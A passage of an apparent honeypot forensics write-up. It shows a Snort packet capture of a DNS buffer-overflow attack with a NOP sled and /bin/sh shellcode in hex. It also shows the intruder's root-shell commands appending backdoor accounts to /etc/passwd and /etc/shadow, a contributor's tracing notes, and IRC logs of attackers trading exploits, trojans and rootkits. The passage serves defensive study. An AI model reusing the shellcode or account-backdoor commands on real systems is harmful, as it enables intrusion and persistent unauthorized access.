0x3FA07873 Ack: 0x45B8E8 Win: 0x7D78 TCP Options => MSS: 1460 SackOK TS: 144023498 4037587 NOP WS: 0 04/26-06:43:05.204503 63.226.81.13:1351 -> 172.16.1.107:53 TCP TTL:50 TOS:0x0 ID:26473 DF ******A* Seq: 0x45B8E8 Ack: 0x3FA07874 Win: 0x7D78 TCP Options => NOP NOP TS: 4037599 144023498 04/26-06:43:05.205940 63.226.81.13:1351 -> 172.16.1.107:53 TCP TTL:50 TOS:0x0 ID:26474 DF *****PA* Seq: 0x45B8E8 Ack: 0x3FA07874 Win: 0x7D78 TCP Options => NOP NOP TS: 4037599 144023498 19 C8 .. 04/26-06:43:05.206168 172.16.1.107:53 -> 63.226.81.13:1351 TCP TTL:64 TOS:0x0 ID:18873 DF ******A* Seq: 0x3FA07874 Ack: 0x45B8EA Win: 0x7D78 TCP Options => NOP NOP TS: 144023509 4037599 04/26-06:43:05.244101 63.226.81.13:1351 -> 172.16.1.107:53 TCP TTL:50 TOS:0x0 ID:26475 DF *****PA* Seq: 0x45B8EA Ack: 0x3FA07874 Win: 0x7D78 TCP Options => NOP NOP TS: 4037599 144023498 0C BC 84 00 00 01 00 01 00 00 00 01 01 72 08 72 .............r.r 73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01 savings.net..... 01 72 08 72 73 61 76 69 6E 67 73 03 6E 65 74 00 .r.rsavings.net. 00 01 00 01 00 00 01 2C 00 04 01 02 03 04 01 72 .......,.......r 08 72 73 61 76 69 6E 67 73 03 6E 65 74 00 00 1E .rsavings.net... 00 01 00 00 01 2C 19 6B 00 06 61 64 6D 61 64 6D .....,.k..admadm 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ ... repeated noops (0x90) removed for brevity sake --- 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 E9 AC ................ 01 00 00 5E 89 76 0C 8D 46 08 89 46 10 8D 46 2E ...^.v..F..F..F. 89 46 14 56 EB 54 5E 89 F3 B9 00 00 00 00 BA 00 .F.V.T^......... 00 00 00 B8 05 00 00 00 CD 80 50 8D 5E 02 B9 FF ..........P.^... 01 00 00 B8 27 00 00 00 CD 80 8D 5E 02 B8 3D 00 ....'......^..=. 00 00 CD 80 5B 53 B8 85 00 00 00 CD 80 5B B8 06 ....[S.......[.. 00 00 00 CD 80 8D 5E 0B B8 0C 00 00 00 CD 80 89 ......^......... F3 B8 3D 00 00 00 CD 80 EB 2C E8 A7 FF FF FF 2E ..=......,...... 00 41 44 4D 52 4F 43 4B 53 00 2E 2E 2F 2E 2E 2F .ADMROCKS.../../ 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E ../../../../../. 2E 2F 2E 2E 2F 00 5E B8 02 00 00 00 CD 80 89 C0 ./../.^......... 85 C0 0F 85 8E 00 00 00 89 F3 8D 4E 0C 8D 56 18 ...........N..V. B8 0B 00 00 00 CD 80 B8 01 00 00 00 CD 80 E8 75 ...............u 00 00 00 10 00 00 00 00 00 00 00 74 68 69 73 69 ...........thisi 73 73 6F 6D 65 74 65 6D 70 73 70 61 63 65 66 6F ssometempspacefo 72 74 68 65 73 6F 63 6B 69 6E 61 64 64 72 69 6E rthesockinaddrin 79 65 61 68 79 65 61 68 69 6B 6E 6F 77 74 68 69 yeahyeahiknowthi 73 69 73 6C 61 6D 65 62 75 74 61 6E 79 77 61 79 sislamebutanyway 77 68 6F 63 61 72 65 73 68 6F 72 69 7A 6F 6E 67 whocareshorizong 6F 74 69 74 77 6F 72 6B 69 6E 67 73 6F 61 6C 6C otitworkingsoall 69 73 63 6F 6F 6C EB 86 5E 56 8D 46 08 50 8B 46 iscool..^V.F.P.F 04 50 FF 46 04 89 E1 BB 07 00 00 00 B8 66 00 00 .P.F.........f.. 00 CD 80 83 C4 0C 89 C0 85 C0 75 DA 66 83 7E 08 ..........u.f.~. 02 75 D3 8B 56 04 4A 52 89 D3 B9 00 00 00 00 B8 .u..V.JR........ 3F 00 00 00 CD 80 5A 52 89 D3 B9 01 00 00 00 B8 ?.....ZR........ 3F 00 00 00 CD 80 5A 52 89 D3 B9 02 00 00 00 B8 ?.....ZR........ 3F 00 00 00 CD 80 EB 12 5E 46 46 46 46 46 C7 46 ?.......^FFFFF.F 10 00 00 00 00 E9 FE FE FF FF E8 E9 FF FF FF E8 ................ 4F FE FF FF 2F 62 69 6E 2F 73 68 00 2D 63 00 FF O.../bin/sh.-c.. FF FF FF FF FF FF FF FF FF FF FF FF 00 00 00 00 ................ 70 6C 61 67 75 65 7A 5B 41 44 4D 5D 31 30 2F 39 plaguez[ADM]10/9 39 2D 65 78 69 74 00 90 90 90 90 90 90 90 90 90 9-exit.......... 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 C3 D6 FF BF C3 D6 FF BF ................ C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF ................ C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF ................ C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF ................ C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF ................ C3 D6 FF BF C3 D6 FF BF 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 ........ . --- COMMENT: The script --- Now that the buffer overflow has been launched, we have a root shell. Something must be done with that rootshell. Our black-hat runs the following commands with that shell. He first confirms the system architecture (uname -a) and the shell uid (id). He then inserts two accounts onto the system, twin and hantu. 04/26-06:43:05.483639 172.16.1.107:53 -> 63.226.81.13:1351 TCP TTL:64 TOS:0x0 ID:18876 DF ******A* Seq: 0x3FA07874 Ack: 0x45D2B2 Win: 0x7C70 TCP Options => NOP NOP TS: 144023537 4037617 04/26-06:43:06.219868 63.226.81.13:1351 -> 172.16.1.107:53 TCP TTL:50 TOS:0x0 ID:26480 DF *****PA* Seq: 0x45D2B2 Ack: 0x3FA07874 Win: 0x7D78 TCP Options => NOP NOP TS: 4037700 144023537 63 64 20 2F 3B 20 75 6E 61 6D 65 20 2D 61 3B 20 cd /; uname -a; 70 77 64 3B 20 69 64 3B 0A pwd; id;. 04/26-06:43:06.233691 172.16.1.107:53 -> 63.226.81.13:1351 TCP TTL:64 TOS:0x0 ID:18877 DF ******A* Seq: 0x3FA07874 Ack: 0x45D2CB Win: 0x7C70 TCP Options => NOP NOP TS: 144023612 4037700 04/26-06:43:06.236460 172.16.1.107:53 -> 63.226.81.13:1351 TCP TTL:64 TOS:0x0 ID:18878 DF *****PA* Seq: 0x3FA07874 Ack: 0x45D2CB Win: 0x7C70 TCP Options => NOP NOP TS: 144023612 4037700 4C 69 6E 75 78 20 61 70 6F 6C 6C 6F 2E 75 69 63 Linux apollo.uic 6D 62 61 2E 65 64 75 20 32 2E 32 2E 35 2D 31 35 mba.edu 2.2.5-15 20 23 31 20 4D 6F 6E 20 41 70 72 20 31 39 20 32 #1 Mon Apr 19 2 32 3A 32 31 3A 30 39 20 45 44 54 20 31 39 39 39 2:21:09 EDT 1999 20 69 35 38 36 20 75 6E 6B 6E 6F 77 6E 0A i586 unknown. 04/26-06:43:06.346489 63.226.81.13:1351 -> 172.16.1.107:53 TCP TTL:50 TOS:0x0 ID:26482 DF ******A* Seq: 0x45D2CB Ack: 0x3FA078C2 Win: 0x7D78 TCP Options => NOP NOP TS: 4037713 144023612 04/26-06:43:06.346819 172.16.1.107:53 -> 63.226.81.13:1351 TCP TTL:64 TOS:0x0 ID:18879 DF *****PA* Seq: 0x3FA078C2 Ack: 0x45D2CB Win: 0x7C70 TCP Options => NOP NOP TS: 144023623 4037713 2F 0A 75 69 64 3D 30 28 72 6F 6F 74 29 20 67 69 /.uid=0(root) gi 64 3D 30 28 72 6F 6F 74 29 20 67 72 6F 75 70 73 d=0(root) groups 3D 30 28 72 6F 6F 74 29 2C 31 28 62 69 6E 29 2C =0(root),1(bin), 32 28 64 61 65 6D 6F 6E 29 2C 33 28 73 79 73 29 2(daemon),3(sys) 2C 34 28 61 64 6D 29 2C 36 28 64 69 73 6B 29 2C ,4(adm),6(disk), 31 30 28 77 68 65 65 6C 29 0A 10(wheel). 04/26-06:43:06.486257 63.226.81.13:1351 -> 172.16.1.107:53 TCP TTL:50 TOS:0x0 ID:26483 DF ******A* Seq: 0x45D2CB Ack: 0x3FA0791C Win: 0x7D78 TCP Options => NOP NOP TS: 4037727 144023623 04/26-06:43:09.880779 213.28.22.189:1045 -> 172.16.1.107:53 UDP TTL:40 TOS:0x0 ID:18907 Len: 40 95 6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72 .k...........r.r 73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01 savings.net..... 04/26-06:43:19.875096 213.28.22.189:1045 -> 172.16.1.107:53 UDP TTL:40 TOS:0x0 ID:18941 Len: 40 95 6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72 .k...........r.r 73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01 savings.net..... 04/26-06:43:39.856657 213.28.22.189:1045 -> 172.16.1.107:53 UDP TTL:40 TOS:0x0 ID:19019 Len: 40 95 6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72 .k...........r.r 73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01 savings.net..... 04/26-06:44:00.432457 63.226.81.13:1351 -> 172.16.1.107:53 TCP TTL:50 TOS:0x0 ID:26498 DF *****PA* Seq: 0x45D2CB Ack: 0x3FA0791C Win: 0x7D78 TCP Options => NOP NOP TS: 4043120 144023623 65 63 68 6F 20 22 74 77 69 6E 3A 3A 35 30 36 3A echo "twin::506: 35 30 36 3A 3A 2F 68 6F 6D 65 2F 74 77 69 6E 3A 506::/home/twin: 2F 62 69 6E 2F 62 61 73 68 22 20 3E 3E 20 2F 65 /bin/bash" >> /e 74 63 2F 70 61 73 73 77 64 0A tc/passwd. 04/26-06:44:00.448249 172.16.1.107:53 -> 63.226.81.13:1351 TCP TTL:64 TOS:0x0 ID:18892 DF ******A* Seq: 0x3FA0791C Ack: 0x45D305 Win: 0x7C70 TCP Options => NOP NOP TS: 144029033 4043120 04/26-06:44:00.562329 63.226.81.13:1351 -> 172.16.1.107:53 TCP TTL:50 TOS:0x0 ID:26499 DF *****PA* Seq: 0x45D305 Ack: 0x3FA0791C Win: 0x7D78 TCP Options => NOP NOP TS: 4043134 144029033 65 63 68 6F 20 22 74 77 69 6E 3A 77 33 6E 54 32 echo "twin:w3nT2 48 30 62 36 41 6A 4D 32 3A 3A 3A 3A 3A 3A 3A 22 H0b6AjM2:::::::" 20 3E 3E 20 2F 65 74 63 2F 73 68 61 64 6F 77 0A >> /etc/shadow. 0A . 04/26-06:44:00.578252 172.16.1.107:53 -> 63.226.81.13:1351 TCP TTL:64 TOS:0x0 ID:18893 DF ******A* Seq: 0x3FA0791C Ack: 0x45D336 Win: 0x7C70 TCP Options => NOP NOP TS: 144029046 4043134 04/26-06:44:03.647436 63.226.81.13:1351 -> 172.16.1.107:53 TCP TTL:50 TOS:0x0 ID:26501 DF *****PA* Seq: 0x45D336 Ack: 0x3FA0791C Win: 0x7D78 TCP Options => NOP NOP TS: 4043443 144029046 0A . 04/26-06:44:03.658554 172.16.1.107:53 -> 63.226.81.13:1351 TCP TTL:64 TOS:0x0 ID:18894 DF ******A* Seq: 0x3FA0791C Ack: 0x45D337 Win: 0x7C70 TCP Options => NOP NOP TS: 144029354 4043443 04/26-06:44:04.699420 63.226.81.13:1351 -> 172.16.1.107:53 TCP TTL:50 TOS:0x0 ID:26502 DF *****PA* Seq: 0x45D337 Ack: 0x3FA0791C Win: 0x7D78 TCP Options => NOP NOP TS: 4043548 144029354 65 63 68 6F 20 22 68 61 6E 74 75 3A 3A 30 3A 30 echo "hantu::0:0 3A 3A 2F 3A 2F 62 69 6E 2F 62 61 73 68 22 20 3E ::/:/bin/bash" > 3E 20 2F 65 74 63 2F 70 61 73 73 77 64 0A > /etc/passwd. 04/26-06:44:04.718625 172.16.1.107:53 -> 63.226.81.13:1351 TCP TTL:64 TOS:0x0 ID:18895 DF ******A* Seq: 0x3FA0791C Ack: 0x45D365 Win: 0x7C70 TCP Options => NOP NOP TS: 144029460 4043548 04/26-06:44:04.829064 63.226.81.13:1351 -> 172.16.1.107:53 TCP TTL:50 TOS:0x0 ID:26504 DF *****PA* Seq: 0x45D365 Ack: 0x3FA0791C Win: 0x7D78 TCP Options => NOP NOP TS: 4043561 144029460 65 63 68 6F 20 22 68 61 6E 74 75 3A 77 33 6E 54 echo "hantu:w3nT 32 48 30 62 36 41 6A 4D 32 3A 3A 3A 3A 3A 3A 3A 2H0b6AjM2::::::: 22 20 3E 3E 20 2F 65 74 63 2F 73 68 61 64 6F 77 " >> /etc/shadow 0A 0A 0A 04/26-06:44:04.848620 172.16.1.107:53 -> 63.226.81.13:1351 TCP TTL:64 TOS:0x0 ID:18896 DF ******A* Seq: 0x3FA0791C Ack: 0x45D398 Win: 0x7C70 TCP Options => NOP NOP TS: 144029473 4043561 04/26-06:46:21.055744 63.226.81.13:1351 -> 172.16.1.107:53 TCP TTL:50 TOS:0x0 ID:26540 DF ***F**A* Seq: 0x45D398 Ack: 0x3FA0791C Win: 0x7D78 TCP Options => NOP NOP TS: 4057184 144029473 04/26-06:46:21.055951 172.16.1.107:53 -> 63.226.81.13:1351 TCP TTL:64 TOS:0x0 ID:18974 DF ******A* Seq: 0x3FA0791C Ack: 0x45D399 Win: 0x7C70 TCP Options => NOP NOP TS: 144043092 4057184 04/26-06:46:21.056696 172.16.1.107:53 -> 63.226.81.13:1351 TCP TTL:64 TOS:0x0 ID:18975 DF ***F**A* Seq: 0x3FA0791C Ack: 0x45D399 Win: 0x7C70 TCP Options => NOP NOP TS: 144043092 4057184 04/26-06:46:21.167231 63.226.81.13:1351 -> 172.16.1.107:53 TCP TTL:50 TOS:0x0 ID:26542 DF ******A* Seq: 0x45D399 Ack: 0x3FA0791D Win: 0x7D78 TCP Options => NOP NOP TS: 4057196 144043092 Exiting... =============================================================================== Snort processed 59 packets. Breakdown by protocol: TCP: 33 (55.932%) UDP: 26 (44.068%) ICMP: 0 (0.000%) ARP: 0 (0.000%) IPv6: 0 (0.000%) IPX: 0 (0.000%) OTHER: 0 (0.000%) =============================================================================== EoF Additional analysis Know your enemy #3: Forensics ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # I will be posting other people's observations on # this page. If you have anything you would like to # add, email Lance Spitzner # Contributed by verin 1. NUS = National University of Singapore. homepage is www.nus.edu.sg 2. 137.132.216.35 = this looks like a home account given to students ( unknown faculty ) 3. 137.132.17.202 = Looks like a labatory computer, library computer, Lecturer's computer, Not a server. ( could be a server. but it'd be an internal one and heavily firewalled. ) 4. [root@apollo /]# nslookup magix : Magix is an ADSL Internet Service Provided by Singtel ( Singapore Telecommunications Ltd.)Attacker may have an account on it. Homepage is www.magix.com.sg 5. [root@apollo /]# nslookup irc.powersurf.com : Most likely hangs around on that server.. probably in channels like #singapore or singapore, NUS related. EoF @HWA The script kids chat logs sniffed from compromised system : #4 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (Sanitized) Day 01 - June 4 :D1ck :hello J4n3 :J4n3 :hello D1ck :J4n3 :i called u , u weren't there :J4n3 ::) :D1ck :oh :D1ck :i just got back from dinner. :D1ck ::/ :D1ck :sup sup? :J4n3 :heh :J4n3 :nothin much :J4n3 :yaar that ifup wasn't connecting :J4n3 :i did it throug kppp of kde :D1ck :oye :D1ck :i am making a elite archieve of sploits just for k1dd13 members :D1ck :can u make pass protection on sites? :J4n3 :D1ck u talkin to me ? :D1ck :yea :J4n3 :yeah i can make it password protected :J4n3 :cgi script :D1ck :ls ftp :D1ck :bd bnc botpack clone dos exploit kit local login scan sniff spoof :D1ck :cool :D1ck :ok :D1ck :i have an account on www.example.com :J4n3 :hehe kewl :D1ck :when i boot i`ll give j00h the pass :D1ck :make sure it's leet i dont want any other person other then u me m4ry mi||er and glitchX to have access :D1ck ::P :D1ck :hehe :D1ck :all leet stuff :J4n3 :y0 hooo :J4n3 :ha ha :J4n3 :d0n worry boss :D1ck :hehehe :D1ck ::) :J4n3 :tight :J4n3 :kewl :J4n3 :zabardasth :p :D1ck :=P :D1ck :u have any stuff u wana get added? :J4n3 :not any thin speciall yaar wahi common sploits :J4n3 :but yeah :J4n3 :i'm gonna grab some from doc :J4n3 :then i'll ad them there :D1ck :? :D1ck :cool :D1ck :doc never gives :( :D1ck :or does he :D1ck :hehe :D1ck :ok :J4n3 :heeh yeah he does :J4n3 :he offered me , but maiany khud hee manga nahi kabi :J4n3 :just once i asked him for statd :J4n3 :he gave me a linux version of it :D1ck :wow.c :D1ck :? :D1ck :wow.c is VERY VERY VERY VERY OLD :D1ck :wow.c is VERY VERY VERY VERY OLD :J4n3 :hhaah yeah :J4n3 :he gave me 2 :J4n3 :wow and another 0-day production :D1ck : Signon by h4r33 :D1ck :OCENTER.SKYINET.NET at 10:08pm :D1ck : wow and another 0-day production :D1ck :wow is not 0-day :D1ck :its old :D1ck :whats the other? :J4n3 :wait :D1ck :hehe :D1ck :nope yaar :J4n3 :[root@example portedfor]# ./statd-new :J4n3 :Legion 2000 Security Research 0-day Productions :J4n3 : New Modified statd remote exploit - ironlungs@wireco.net :J4n3 :sage: ./statd-new [host_name] [remote_cachename] [command] :D1ck :hmmmmm :D1ck :cool :D1ck :can u send me? :D1ck :0x9 098e 9x / :J4n3 :why not honey :J4n3 :;) :D1ck :k thanks :D1ck : who the fuck removed my xs again ? :D1ck :HAHAHAHA :J4n3 :hahahahha :D1ck :d4v3 :D1ck : send me the .c :J4n3 :don have it :J4n3 :i got compiled one :D1ck :man it could be a trojan? :J4n3 :i got all these compiled :D1ck :they can direct shell code to localhost, 12.0.0.1 :J4n3 :haha naaa :D1ck :not may good coders can read it. :J4n3 :its not 100 % :D1ck :heh well ok :J4n3 :meri guarantie :D1ck :send me the other 0-day :D1ck :kewl :D1ck :does it work :J4n3 :i got all these already compiled :D1ck :? :J4n3 :yyeah it does but mostly boxes r patched :J4n3 :[root@example portedfor]# ls :J4n3 :admmount imapx mountd pcnfsd_remote rotshb statd-new :J4n3 :boot listen nameserver ported_f.zip smbmount wow :J4n3 :dipx lsx nisd robo solbind :D1ck :heh ok :J4n3 :and yeah wait :J4n3 :[root@example 0-day]# ls :J4n3 :core fbo.c ob_accou.c prout rh6mountd.c rpc-autofsd sdi :D1ck :okies :D1ck :hahah kewl :D1ck :/dcc send me if u can/want :/ :J4n3 :kon kon sa baijon ? all ? :D1ck :tar -zcvf 0-day.tar.gz 0-day :J4n3 :what the tar command lemme tar the 0-day folder :D1ck : /dcc send D1ck 0-day.tar.gz :D1ck :hehe :D1ck : tar -zcvf 0-day.tar.gz 0-day :D1ck :rr heh :J4n3 :oye :D1ck :yo :J4n3 :i downloaded a file from packetstorm :J4n3 :name was ALL-EXPLOITS-1999 :D1ck :yep? :J4n3 :6 mb file :J4n3 :ALL-EXPLOITS-199.tar.gz :J4n3 :ALL-EXPLOITS-1999.tar.gz :J4n3 :too many sploits in them :J4n3 :it made 10 folders :J4n3 :evey folder contain different sploits :D1ck :ok and? :J4n3 :i mean to say u also download it, shayed kaam kee cheez niklay :D1ck :oh accha :D1ck :give me the url :D1ck :yaar most exploits are dummy's or trojans remember :D1ck :or they have bugs :D1ck :only a few worl :D1ck :only a few worl :J4n3 :packetstorm.securify.com look in main page at top 20 recent files :D1ck :errr :J4n3 :yeah i know :D1ck :send me i`ll put important ones in there :D1ck :okies :D1ck :suspicious code :D1ck :rhmountd.c :D1ck :checkign :J4n3 :kkz :D1ck :did they compile? :D1ck :ah :D1ck :IRIX :J4n3 :that account.c ? :D1ck :yep :J4n3 :yeah i heard its a great program :J4n3 :it remotely add login and pass on IRIX system :D1ck :hmmmm :D1ck :i think its locally :J4n3 : SGI objectserver "account" exploit */ :J4n3 : Remotely adds account to the IRIX system. */ :J4n3 : Tested on IRIX 5.2, 5.3, 6.0.1, 6.1 and even 6.2, :D1ck :kewl kewl :D1ck :Oh this is the 0-day :D1ck :Oh this is the 0-day :J4n3 :yeah :D1ck :leet :D1ck :does it compile? :J4n3 ::p :J4n3 :on irix i think :D1ck :haha ok :D1ck :# uname -a; :D1ck :id :D1ck :IRIX delta 5.3 11091811 IP19 mips :D1ck :# uid=0(root) gid=0(sys) :D1ck :# :D1ck :HAHAHAHAH :D1ck :don't get exited, i`m joking :/ :D1ck :hehe :J4n3 :hahahah :J4n3 :COOOOL :J4n3 :it works haaan :J4n3 :where did u compile it ? on IRIX system ? :D1ck :hehehhe :D1ck :i am kidding :D1ck :oe :D1ck :oye :D1ck ::) :J4n3 :lol :J4n3 :yeah ? :J4n3 :des|re .join #tr1be grepbitch :D1ck :oye :D1ck :send yure brother :J4n3 :yeah :D1ck :the url :D1ck :to that 6mb exploit file :D1ck :heh :J4n3 :my brother ? :D1ck :me :D1ck ::) :D1ck : my brother ? :D1ck : me :J4n3 :hahaha :J4n3 :sure sure :D1ck ::) :D1ck :LOL :J4n3 :hehe :D1ck :J4n3 :D1ck :give me some machine :D1ck :i`ll sploit it :D1ck :irix :D1ck :this way bots remember. -=- Day 02 June 5 :D1ck :miller :D1ck :;) :b0b :commerce? :b0b :lame nick ;-) :D1ck :? :b0b :d1ckey :D1ck :heh :D1ck :welp :D1ck :one bot from one box :D1ck :we dont have nicks :D1ck :so we name it from the ops :D1ck :hehe :D1ck :ips :D1ck : commerce (~werd@commerce.example.COM) (I :b0b :lol :b0b :ath0 my phriend :D1ck :so what's up b0b :D1ck ::/ :D1ck :commerce nick ath0 :D1ck :i coded ath0.c :b0b :kewl :D1ck :there was no need :D1ck :but :D1ck :i was boed :D1ck :accept my stuff :b0b :cut/paste? :D1ck :nope :D1ck :coded my self :D1ck :m4ry coded a elite port 80 httpd 0-day trojan :D1ck :he is mad elite in C :b0b :i know.. i was asking you to cut/paste the relevany code :-) :D1ck :heh :D1ck :bd.tar.gz is a backdoor for bindshell, i made that too :D1ck ::) :b0b :uff trunciated :b0b :kewl :D1ck :don't distro vortex3.c, its not mine :/ :D1ck :hehe :D1ck : uff trunciated :D1ck :i dint understand what that word means :/ :D1ck :be EASY ON ENGALISH WITH ME #@#$@#$@#%$#@ :D1ck ::) :b0b :what's vor-ticks-3? :b0b :hehe :b0b :chud gai thee :b0b :carriage returns :D1ck :A TROJAN :D1ck :on receiving a string :D1ck :on port 80 :D1ck :it opens a bind shell :D1ck :like on a string'asad' :D1ck :it opens port 234323, :D1ck :or some thing :D1ck :hehehe :D1ck :LOL :b0b :bhai jaan.. :b0b :if it is i c.. do some ereet shiats like subnet pining with ath0 etc. :D1ck :y0h f0h b4r :b0b :would be a whole lot faster than a bash scrwipt :b0b :me and angie already did the subnet ping shiats tc. :b0b :but C would rawk :b0b :0wn even :D1ck :yep :D1ck :i`ll do it :b0b :kewl :D1ck :but :D1ck :shell script is a better idea. :D1ck :or i1ll have to write codes for gethostname() :b0b :and make it fork to background eggdrop ishtyle :-) :b0b :and loop :D1ck :abd work on errors :D1ck :hehe :D1ck :yep :b0b :so if we wanna fux0r one isp.. all we do is ./fuck :b0b :so if we wanna fux0r one isp.. all we do is ./fuck :D1ck : DCC Auto-closing idle dcc SEND to b0b :D1ck :bind,sock. :D1ck :ah :D1ck :yep :b0b :do the gethostbyname() shiats foo :b0b :or what good are ur m4d C skillz? :b0b :send again :b0b :btw, i'm going to be learning C soon too inshallah :b0b :the we'll have C fights :b0b :yipeeee :b0b :i'll insult you in code :b0b :kekekeke :D1ck :i`ll do it ;) :D1ck :i made this ftp site i`ll upload it :D1ck :just for k1dd13, all private stuff :D1ck :ls /root/ftp :D1ck :bd botpack dos hack-irc-session local scan spoof :D1ck :bnc clone exploit kit login sniff :D1ck :oki :D1ck :i`ll do :D1ck :hahahaha :b0b :and once we develop m4d C skillz.. we'll develop D :D1ck :kekekeke :b0b :the ultimate in URDU coding :b0b :eeeeeeeeeeeekekekekekekekekekeke :b0b :grep == dhoond :b0b :no no :b0b :find == dhoond :b0b :locate == madarcho-dhond :m4ry :MILLER@&*(#^*(@%^#*(&@ :b0b :export == duramad :b0b :m4ry :b0b :i was just doing some concept shiats for D :b0b :the ultimate in URDU coding :b0b :the base for urdunix :m4ry :HAHAHAHAHAHAHAHAHAHAHAH :b0b :export == duramad :b0b :find == dhoond :b0b :locate == madarchod-dhoond :b0b :exit == lun :b0b :BitchX == kutti :b0b :eehee :b0b :first.. lets develop BitchX in URDU :b0b :KuttiX :m4ry :l33t :m4ry :run == bhago :m4ry :LOL :m4ry :HAHAHAHA :m4ry :KuttiX.. LOL :b0b :eehee :b0b :./kick == /thudda :m4ry :D1ck :D1ck :miller :D1ck :u there? :D1ck :i got d/c :b0b :./op ==/ooperbitha :D1ck :some one is dosing me :) :b0b :no.. it's my friend bubloo :b0b :OF COURSE I'M HERE DAMMIT :D1ck :m4ry :D1ck :m4ry :b0b :btw guys... :D1ck :y0h :b0b :guess how many hosts i have in my bclist? :D1ck :b0b how many? :D1ck :udp flood > * :m4ry :.yo yo :m4ry :b0b: 28 :m4ry :b0b: 5 :D1ck :it literally rapes bandwith. :m4ry :how close ami? :m4ry :# telnet napster.com 80 :m4ry :Trying 208.184.216.230... :m4ry :Connected to napster.com. :m4ry :Escape character is '^]'. :m4ry :HEAD / HTTP/1.1 :m4ry :SYN FLOOD > * :b0b :phuck yew :D1ck :heh m4ry :b0b :2066 bloody :m4ry :b0b: how many? :b0b :the scan is reaheaheaheahly slow :m4ry :HAHAHAHA :m4ry :aww :m4ry :ur not l33t :P~ :m4ry :l33t hax0rs have 3 bcasts :m4ry :which return thouussannndsss of pings :m4ry :(in my dreams) :m4ry :hehe :b0b :ehehehehe :b0b :this is one BIG ass bc :b0b :who wants a taste? :b0b :just 100 pings? :D1ck :HAHAHAHAH :D1ck :syn 0wns y3w niggah :D1ck :: :D1ck :HAHAHAHAHAHA :D1ck :g|ngah :D1ck :b0b: take broadscan by pshysoid :D1ck :NOT ME :D1ck : :D1ck ::) :D1ck :me and J4n3 and m4ry have TONS TONS TONS bandwith :/ :D1ck :we use it on h4r33 :D1ck :heh :D1ck :h4r33 is ultra lame :D1ck : :b0b :lol :D1ck :not worth a thought :D1ck ::) :D1ck :hehe :D1ck :cricket match is funny :b0b :damn :b0b :gotta jet :b0b :later all :b0b :fuck cricket :b0b :winuke their arses :b0b :laters :D1ck :heh :D1ck : damn :__m4ry :someone traceroute 192.168.4.191 UDP port 53 :__m4ry :aww :__m4ry :he ran away again :__m4ry :__m4ry is viper@192.168.252.32 * 3r33t hackers don't read mIRC.doc :__m4ry :HEHE :D1ck : gotta jet :D1ck : later all :D1ck : fuck cricket :D1ck : winuke their arses :D1ck : SignOff b0b: :D1ck : ]) :D1ck :he's gone for another 4 months :D1ck :HEHE :D1ck :hhahaha :D1ck :;) :D1ck :m4ry :D1ck :help me :D1ck :sysop:( :HeatAz :yeah :HeatAz : : :HeatAz ::/ :D1ck :hehehe :m4ry :helping :m4ry :sup? :D1ck :hahaha :m4ry :LOL :D1ck :well :D1ck :cat world | grep -v sysop > hell :D1ck :PLEASE :D1ck :;) :D1ck ::( :m4ry :lol :m4ry :egrep sysop /dev/world > /dev/hell :D1ck :heh :D1ck :m4ry :D1ck :i`m making a mad elite :D1ck :ftp site :m4ry :D1ck.. :m4ry :could u please traceroute 192.168.4.191 -p 53 :m4ry :? :D1ck :just for amoung us :D1ck :its got every thing :D1ck :# ls :D1ck :bd botpack dos hack-irc-session local scan spoof :D1ck :bnc clone exploit kit login sniff :D1ck :k :D1ck :traceroute to 192.168..4.191 (192.168.4.191), 30 hops max, 38 byte packets :D1ck : 1 192.168.232.254 (192.168.232.254) 148.127 ms 151.760 ms 160.238 ms :D1ck : 2 192.168.232.3 (192.168.232.3) 154.337 ms 138.676 ms 139.853 ms :D1ck : 3 192.168.244.30 (192.168.244.30) 226.507 ms 225.720 ms :D1ck : 3 192.168.244.30 (192.168.244.30) 226.507 ms 225.720 ms * :D1ck : 4 192.168.129.13 (192.168.129.13) 1170.320 ms 1041.645 ms 1221.868 ms :D1ck :m4ry :D1ck :u have any thing elite to contribute there? :D1ck :[Sysop_(~sys@example.com)] hey :D1ck :YOH HA NA :D1ck :ROXZ :D1ck :HE JUST HIT A SIX :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On] :b0b :brb, reading mail etc. :b0b :ACTION is idle, mail shail [bX(l/on p/on)] :D1ck :J4n3 :J4n3 :hmmm :J4n3 :oye miller was here ? :D1ck :0 J4n3 :D1ck :y0 J4n3 :D1ck :yep :D1ck :millah was here. :D1ck ::) :J4n3 :ohhh :J4n3 :missed him :J4n3 ::( :J4n3 :D1ck gime a elitee rootkit for linux :D1ck :hehe :J4n3 :same like sparc if u have :D1ck :h3h :D1ck :oki 